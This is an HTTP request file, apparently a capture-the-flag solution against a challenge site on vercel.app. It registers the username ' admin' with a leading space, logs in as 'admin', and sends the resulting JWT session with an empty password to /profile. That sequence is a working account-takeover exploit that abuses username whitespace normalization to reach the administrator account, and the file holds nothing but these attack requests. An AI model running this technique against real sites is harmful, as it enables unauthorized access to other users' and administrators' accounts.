@url = https://chal43-alal08.vercel.app

GET {{url}}/ HTTP/1.1

###

POST {{url}}/register HTTP/1.1
Content-Type: application/json

{
  "username": " admin",
  "password": "P@ssword1!"
}

###

POST {{url}}/login HTTP/1.1
Content-Type: application/json

{
  "username": "admin",
  "password": "P@ssword1!"
}

###

POST {{url}}/profile HTTP/1.1
Content-Type: application/json

{
  "session": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNzM3MDQ1MTExLCJleHAiOjE3MzcwNDg3MTF9._7yw2YS0X3o2BFC-neFZpY4XhoOc9xeKWXX3DoE68-c",
  "username": "admin",
  "password": ""
}